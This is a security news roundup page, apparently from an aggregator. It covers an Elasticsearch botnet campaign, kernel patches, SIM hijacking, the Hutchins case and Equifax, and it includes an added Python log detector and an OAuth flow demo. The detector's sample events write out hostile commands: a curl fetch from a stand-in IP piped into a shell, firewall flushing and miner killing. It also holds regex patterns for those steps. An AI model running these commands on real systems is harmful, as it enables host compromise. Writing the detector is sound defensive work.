Security

Security: Cyberattack on Elasticsearch, Available Updates, AT&T Liability and New HardenedBSD Release

Filed under
Security
  • Cyberattack on Elasticsearch Databases turns DBs into Zombies/Botnets

    A new cyberattack has joined the list of those aimed at Elasticsearch, and this one turns exposed Elasticsearch databases into zombies, i.e. nodes of a botnet.

    Elasticsearch databases have been attacked repeatedly over the past few years. The new campaign worries security experts more than earlier ones because of its complexity and because it combines several tactics to evade security controls and carry the attack through to completion.

    Elasticsearch is a popular tool that lets companies manage billions of records easily. Its source code is open, and large companies such as Netflix, Uber, Dell, and Adobe already use it. That reach is exactly why attackers are keen to find vulnerabilities in this tool and exploit them to take control of systems.

    Recently, the cybersecurity company Trend Micro revealed that hackers have targeted publicly reachable Elasticsearch databases, delivering a backdoor as the payload.

    The attack requires multiple scripts to be executed on the victim, beginning with disabling the system firewall and stopping any cryptocurrency-mining processes already running on the host (so that the attacker's own miner faces no competition). Once those steps succeed, the attackers download a further script to the server from a compromised or otherwise dubious website.
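    The chain described above (firewall switched off, rival miners killed, a second-stage script fetched with curl or wget and piped into a shell) is exactly the kind of sequence a process-execution log exposes. The Python below is an added example written for this page; it is not code from Trend Micro or from the article. It runs a simple stage classifier over constructed sample events in an assumed "parent-process command" line shape, and treats shells spawned by the Elasticsearch JVM (parent `java`) as the suspect population. The indicator patterns, the parent-process name and the sample lines are all assumptions for illustration, not indicators taken from the report.

```python
import re

# Constructed sample of process-execution events, one per line, in the
# assumed shape "<parent-comm> <child command line>". These lines are made
# up for this example; they are not taken from the attack described above.
SAMPLE_EVENTS = [
    "java /bin/sh -c 'iptables -F'",
    "java /bin/sh -c 'ufw disable'",
    "java /bin/sh -c 'pkill -f xmrig; pkill -f minerd'",
    "java /bin/sh -c 'curl -fsSL http://198.51.100.7/stage2.sh | sh'",
    "cron /usr/sbin/logrotate /etc/logrotate.conf",
    "sshd /bin/sh -c 'ps aux'",
]

# Assumed indicator patterns for the three stages the article mentions.
STAGES = {
    # firewall being disabled or flushed
    "firewall_disabled": re.compile(
        r"\b(iptables\s+-F|iptables\s+-P\s+\w+\s+ACCEPT|ufw\s+disable|"
        r"systemctl\s+(stop|disable)\s+firewalld)\b"),
    # competing miners being killed (names are illustrative)
    "miner_killed": re.compile(
        r"\b(pkill|killall|kill\s+-9)\b.*\b(xmrig|minerd|cryptonight|kdevtmpfsi)\b",
        re.I),
    # a remote script pulled over HTTP and piped straight into a shell
    "stage2_download": re.compile(
        r"\b(curl|wget)\b[^|;]*(https?://\S+)[^|;]*\|\s*(sh|bash)\b"),
}


def parse_event(line):
    """Split an event line into (parent process name, child command line)."""
    parent, _, cmd = line.partition(" ")
    return parent, cmd


def analyse(events, shell_parents=("java",)):
    """Return, per stage, the commands that matched and were spawned by a
    suspect parent (the Elasticsearch JVM runs as `java`, an assumption)."""
    hits = {stage: [] for stage in STAGES}
    for line in events:
        parent, cmd = parse_event(line)
        if parent not in shell_parents:
            continue
        for stage, pattern in STAGES.items():
            if pattern.search(cmd):
                hits[stage].append(cmd)
    return hits


def verdict(hits):
    """Two or more stages from the same parent is a strong signal; one is
    worth a look; none is clean."""
    seen = [stage for stage, cmds in hits.items() if cmds]
    if len(seen) >= 2:
        return "compromise_likely"
    return "suspicious" if seen else "clean"


if __name__ == "__main__":
    result = analyse(SAMPLE_EVENTS)
    for stage, cmds in result.items():
        print(f"{stage}: {len(cmds)} hit(s)")
    print("verdict:", verdict(result))
```

    The point of keying on the parent process rather than on the command alone is that `iptables -F` typed by an administrator over SSH and the same command spawned by a search engine's JVM are very different events; the second should never happen on a healthy Elasticsearch host.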

  • Security updates for Monday

    Security updates have been issued by Debian (patch, sdl-image1.2, and unzip), Fedora (deepin-clone, dtkcore, dtkwidget, and sqlite), Mageia (virtualbox), openSUSE (firefox), and SUSE (cronie and firefox).

  • Court Will Decide If AT&T Is Liable For Cryptocurrency Theft Caused By Shoddy Security

    Wireless carriers are coming under increasing fire for failing to protect their users from SIM hijacking. The practice involves posing as a wireless customer and fooling the carrier into porting the victim's phone number right out from underneath them, after which the attacker can pose as the customer to potentially devastating effect, because SMS-based password resets and one-time codes now land in the attacker's hands. Back in February, a man sued T-Mobile for failing to protect his account after a hacker pretending to be him ported out his phone number and then used the stolen identity to take thousands of dollars' worth of cryptocurrency.

    T-Mobile customers aren't the only ones who've experienced this problem. US entrepreneur and cryptocurrency investor Michael Terpin sued AT&T last summer for the same thing: somebody ran a SIM hijacking scam on AT&T, then stole his identity and, in turn, stole $23.8 million in cryptocurrency.

  • Stable release: HardenedBSD-stable 12-STABLE v1200059.2

Debian Outs First Linux Kernel Security Update for Debian GNU/Linux 10 "Buster"

Filed under
Security
Debian

Released earlier this month, the latest Debian GNU/Linux 10 "Buster" operating system has just received its first Linux kernel security update. It addresses a security flaw (CVE-2019-13272) discovered by Google Project Zero's Jann Horn in the Linux kernel's ptrace subsystem, which could let a local user obtain root privileges.

"Jann Horn discovered that the ptrace subsystem in the Linux kernel mishandles the management of the credentials of a process that wants to create a ptrace relationship, allowing a local user to obtain root privileges under certain scenarios," reads the security advisory published by Salvatore Bonaccorso last week.

Read more

OSS and Security Leftovers

Filed under
OSS
Security
  • OpenHMD: Open Source Project for VR Development

    A universal distortion shader was added to OpenHMD. This addition “makes it possible to simply set some variables in the drivers that gives information to the shader regarding lens size, chromatic aberration, position and quirks.”

    They also announced plans to change the build system. OpenHMD added support for Meson and will remove support for Autotools in the next (0.4) release.

    The team behind OpenHMD also had to remove some features because they want their system to work for everyone. Support for PlayStation VR has been disabled because of an issue on Windows and macOS caused by incomplete HID headers. NOLO has a number of firmware versions, many differing only by small changes. OpenHMD is unable to test all of them, so some versions might not work; they recommend upgrading to the latest firmware release. Finally, several devices only have limited support and are therefore not included in this release.

  • API Fortress launches open source app, 3loa Helper, to automate 3-legged OAuth 2.0 flows

    API Fortress, the leader in continuous API testing, announces 3loa Helper, an open source application that automates 3-legged OAuth 2.0 flows from the world’s largest social and search providers.

    By simply integrating API Fortress with 3loa Helper, developers and test engineers can test and validate 3-legged OAuth flows.

    “Too many tests today don’t truly reproduce the user flows a production API sees,” says Patrick Poulin, CEO and co-founder at API Fortress, “This leaves risky holes in a test plan, and ignores what is often the very first step for users.”

    It is difficult to automate 3-legged OAuth 2.0 flows for API testing because 3-legged OAuth 2.0 was specifically designed to require user intervention: the resource owner has to be redirected to the provider, authenticate, and approve the request before the client ever receives an authorization code.
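    To make concrete what a test harness such as the one announced above has to automate, here is an added example of the three legs of the OAuth 2.0 authorization code flow, written for this page and not taken from 3loa Helper or any provider. Both sides are simulated offline: the client builds the authorization request (with `state` and a PKCE S256 challenge), a stand-in for the provider plays the human consent step and redirects back, and the client then binds the callback to the request it started before exchanging the code. The endpoint URLs, client identifier and redirect URI are assumed placeholders.

```python
import base64
import hashlib
import secrets
from urllib.parse import parse_qs, urlencode, urlparse


def _b64url(raw):
    """Unpadded base64url, as PKCE (RFC 7636) requires for the challenge."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def start_authorization(authorize_endpoint, client_id, redirect_uri, scope):
    """Leg 1 (client): build the redirect that sends the user to the provider.
    Returns the URL plus the per-request secrets the client must keep."""
    state = secrets.token_urlsafe(16)       # binds the callback to this request
    verifier = secrets.token_urlsafe(32)    # PKCE verifier, never leaves the client until leg 3
    challenge = _b64url(hashlib.sha256(verifier.encode("ascii")).digest())
    params = {
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": scope,
        "state": state,
        "code_challenge": challenge,
        "code_challenge_method": "S256",
    }
    pending = {"state": state, "code_verifier": verifier, "redirect_uri": redirect_uri}
    return f"{authorize_endpoint}?{urlencode(params)}", pending


def simulate_provider_consent(auth_url, approve=True):
    """Leg 2, a stand-in for the human: parse the request as a provider would,
    remember the PKCE challenge against the code it issues, and redirect back.
    This is the step a real flow cannot complete without a person."""
    q = {k: v[0] for k, v in parse_qs(urlparse(auth_url).query).items()}
    issued = {}
    if not approve:
        redirect = f"{q['redirect_uri']}?{urlencode({'error': 'access_denied', 'state': q['state']})}"
        return redirect, issued
    code = secrets.token_urlsafe(24)
    issued[code] = {"challenge": q["code_challenge"],
                    "redirect_uri": q["redirect_uri"],
                    "client_id": q["client_id"]}
    return f"{q['redirect_uri']}?{urlencode({'code': code, 'state': q['state']})}", issued


def handle_callback(callback_url, pending):
    """Leg 3 (client side): only accept a callback whose state matches the
    request we started, then assemble the token request."""
    q = {k: v[0] for k, v in parse_qs(urlparse(callback_url).query).items()}
    if not secrets.compare_digest(q.get("state", ""), pending["state"]):
        raise ValueError("state mismatch: callback is not bound to our request")
    if "error" in q:
        raise PermissionError(q["error"])
    return {
        "grant_type": "authorization_code",
        "code": q["code"],
        "redirect_uri": pending["redirect_uri"],
        "code_verifier": pending["code_verifier"],
    }


def provider_token_exchange(token_request, issued, client_id):
    """Leg 3 (provider side): the code is single-use, redirect_uri and client
    must match what was authorized, and the verifier must hash to the stored
    challenge. Returns a token on success (a random placeholder here)."""
    rec = issued.pop(token_request["code"], None)
    if rec is None:
        raise PermissionError("unknown or already-used authorization code")
    if rec["redirect_uri"] != token_request["redirect_uri"] or rec["client_id"] != client_id:
        raise PermissionError("redirect_uri or client_id does not match the authorization")
    expected = _b64url(hashlib.sha256(token_request["code_verifier"].encode("ascii")).digest())
    if not secrets.compare_digest(expected, rec["challenge"]):
        raise PermissionError("PKCE verification failed")
    return {"access_token": secrets.token_urlsafe(32), "token_type": "Bearer"}


def run_flow(approve=True):
    """Drive all three legs end to end with assumed placeholder endpoints."""
    client_id, redirect_uri = "example-client", "https://client.example/cb"
    auth_url, pending = start_authorization(
        "https://provider.example/authorize", client_id, redirect_uri, "profile")
    callback, issued = simulate_provider_consent(auth_url, approve)
    token_request = handle_callback(callback, pending)
    return provider_token_exchange(token_request, issued, client_id)


if __name__ == "__main__":
    print(run_flow())
```

    When a test harness replaces leg 2 with something automated, the two checks in leg 3 are what keep the shortcut from becoming a hole: the `state` comparison rejects a callback the client never initiated, and the PKCE check means an intercepted code is useless without the verifier that never left the client.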

  • Week 9 Report

    First of all, this week was the second evaluation result of the project, and I am happy to be working on this project. Thanks to all of the LO family.

  • Building a Successful Open Source Management Strategy

    When software is deployed continuously, composition analysis for quality, compliance, and security within code needs to be managed strategically. Ensuring that the benefits of open source are not outweighed by risks, software developers and corporate counsel must align around tools and practices to help manage their open source code responsibly to drive business value. Building and Maintaining a Successful Open Source Management Strategy discusses:

  • Rowan college affordability initiative takes aim at textbooks

    Rowan University is doubling the size of a grant program to create free course materials for students...

  • RISC Is Fundamentally Unscalable
  • After Two Years, Malwaretech Is A Free Man

    The judge then emphasized that, on top of everything else, Hutchins had been away from home for two years.

    That’s when something happened that every lawyer I spoke with who was watching in the courtroom called unprecedented. The judge suggested Hutchins should get a pardon, which would enable him to come back to the US to work. “While court has no pardon power, matter reserved to the executive. Truly left for another day.”

    He then imposed Hutchins’ sentence. “We reach a point in balancing these considerations, court left to make final call. Final call is a sentence of time served with one year of supervised release.” He went on to make it clear that, once Hutchins finishes packing up his life in LA, he wanted to be sure that Immigration doesn’t get custody. “Nothing in this judgement requires he stay in the United States. I’m seeking to avoid him being taken into custody by Immigration and Customs. We don’t need any more publicity or another statistic.”

  • Arduino Selects Auth0 as Standardized Login for Open-Source Ecosystem

    Auth0, a global leader in Identity-as-a-Service (IDaaS), today announced it has been selected as the identity management platform of choice for Arduino®, the world’s leading open-source hardware and software ecosystem. With a global community of 30 million “makers”, Arduino will use Auth0 to replace its own Single Sign On solution for all of its public facing web properties, including Arduino Create and community apps.

Security Leftovers

Filed under
Security
  • Russia Suspected In Attempted ProtonMail Client Hack

    ProtonMail, an email service based in Switzerland, has been targeted in a sophisticated cyber attack aimed at journalists investigating Russian intelligence activities, the company says.

    The target was Bellingcat, an open-source investigative website that has been probing the involvement of Russia and its GRU intelligence service in the downing of flight MH17 over Ukraine in 2014.

    On Saturday, ProtonMail published a blog post saying that these attempts had failed, and that reports stating that ProtonMail itself had been hacked were inaccurate.

  • 5 Free Linux Antivirus – Anti-Ransomware, Server Malware And Spyware [Ed: Very poor, weak article. Compares NSA back doors in Windows to Linux and speaks of security problems one actually needs to recklessly install.]

    The WannaCry ransomware epidemic hit Windows users like wildfire, but what can it do on a Linux system running Wine? Is Linux immune to ransomware? Will Linux protect you from ransomware attacks?

  • Fernando Corbato: Scientist who fostered the digital revolution and the computer password

    Fernando Corbato’s achievements in computer science have had a huge impact on daily life. His work drastically expanded the usefulness of the computer and put its benefits within the reach of all. But he also made his mark on the modern world by conceiving and applying the idea of controlling computer access by passwords.

    Corbato, who has died aged 93, was a professor emeritus at the Massachusetts Institute of Technology, where he was interested in the problem of increasing access to computers while protecting individual privacy and data. Passwords seemed to be the solution, and he found himself drawn to the discipline that would become known as computer science.

    He entered the new arena in its early days, when the slide rule or the mechanical calculator were mainstays of computation. In 1956, when Corbato began at the MIT Computation Centre, machines and their operations were characterised by such items as vacuum tubes, paper tape and stacks of the infamous punch cards – the last giving rise to the slogan, “Do not fold, spindle or mutilate.”

Canonical Outs Linux Kernel Security Patch for Ubuntu 16.04 LTS to Fix Six Flaws

Filed under
Security

This new Linux kernel security patch comes hot on the heels of the security update released earlier this week for the Ubuntu 19.04 (Disco Dingo) and Ubuntu 18.04 LTS (Bionic Beaver) operating system series, but it's only available for users of the Ubuntu 16.04 LTS (Xenial Xerus) operating system series running the stock Linux 4.4 kernel.

It addresses a total of six flaws, including an integer overflow (CVE-2019-10142) discovered in Linux kernel's Freescale (PowerPC) hypervisor manager and a race condition (CVE-2018-20836) discovered in the Serial Attached SCSI (SAS) implementation, which could allow a local attacker to execute arbitrary code or cause a denial of service (system crash).

Read more

Security Leftovers

Filed under
Security
  • Goodbye Docker: Purging is Such Sweet Sorrow

    After 6 years, I removed Docker from all my home servers.

  • Equifax Might Owe You $125. Here's How to Get It

    If you're one of the 147 million people in the United States affected by the egregious Equifax credit bureau hack in 2017, you were probably resigned to getting some free credit monitoring out of it and moving on. But nearly two years later, attorneys general from 50 US states and territories, the Federal Trade Commission, and the Consumer Financial Protection Bureau finally have your back. Sort of. They've negotiated a settlement with Equifax that entitles all victims to 10 years of free credit monitoring, or $125. Here's how to make sure you get yours.

  • Why you probably won’t actually get $125 from the Equifax settlement

    See, while Equifax has agreed to a $700 million settlement — compared to its revenue of $880 million last quarter alone — it’s technically only a $425 million settlement as far as affected consumers are concerned, with the rest of the money going to pay penalties.

    And of that $425 million, it turns out only a paltry $31 million is actually set aside for those individual $125 cash payments — the rest is all for free credit monitoring, reimbursements, or if you could somehow miraculously prove you actually suffered identity theft as a result of the breach.

  • SMBs ‘severely underestimate’ cybersecurity vulnerabilities: report [iophk: Windows TCO]

    And, according to cyber security provider Keeper Security, which commissioned a study of more than 500 senior-level decision makers at companies with 500 employees or less, cyber security efforts are not at the top of the list of SMBs when it comes to where leaders are putting their focus and efforts – with US businesses “ripe for the picking”.

LastPass vs Bitwarden: Should You Switch to An Open Source Password Manager

Filed under
OSS
Security

Choosing a password manager can be a headache. You will be using it to store your passwords, notes, and whatnot. As such, you want it to be safe and reliable. LastPass is one of the most popular password managers but it has some flaws. It has been in the news for getting hacked, more than once, and is owned by LogMeIn.

Read more

Security and Proprietary Software With Back Doors

Filed under
Microsoft
Security
  • Cyber expert who helped stop WannaCry sentenced to time served in malware case

    While Hutchins was sentenced to time served, he could have faced up to 10 years in prison and $500,000 in fines. He served a few days in jail after being arrested in 2017, but was then freed on bail on the condition that he remain in the U.S. while his case was pending.

  • The Latest: Cyber expert gets time-served in malware case

    U.S. District Judge J.P. Stadtmueller sentenced 25-year-old Marcus Hutchins on Friday in Milwaukee to time served, with a year of supervised release. Stadtmueller said the virus Hutchins helped stop was far more damaging than the malware he wrote.

  • Cyber-Crook Turned Global Hero Avoids Prison In Malware Case

    Marcus Hutchins was sentenced Friday by U.S. District Judge Nancy Joseph in Milwaukee, Wisconsin. He pleaded guilty in April to two counts related to his marketing and distribution of malware called Kronos and UPAS, which his customers used to steal the bank details of unsuspecting victims around the world. Hutchins was arrested in July 2017 after he traveled to the U.S.

  • Boeing's Corporate Suicide

    Boeing's cost-cutting means it lacks the necessary in-house software expertise to develop and QA the fix.

Which Linux distro is best for privacy?

Filed under
GNU
Linux
Security

Linux operating systems are better for privacy and security than their Mac and Windows counterparts. They are also open source, which means they are much less likely to be hiding backdoors for their developers, the NSA, or anybody else.

It is for this reason that Linux distros are the Operating System of choice for security professionals and privacy advocates as well as for the majority of computer servers around the globe.

There are plenty of Linux distros to choose from. And this can make it confusing for anybody wanting to move away from Windows in favor of something more secure. Even existing Linux users may be slightly unsure as to which Linux distro they ought to be using if they value privacy and security.

In this article, we will walk you through two of the best Linux distros for protecting your data and staying clear of hackers. All Linux distros have specific peculiarities and advantages, meaning that they all do slightly different things. However, there are two Linux distros that stand out where privacy is concerned...

Read more
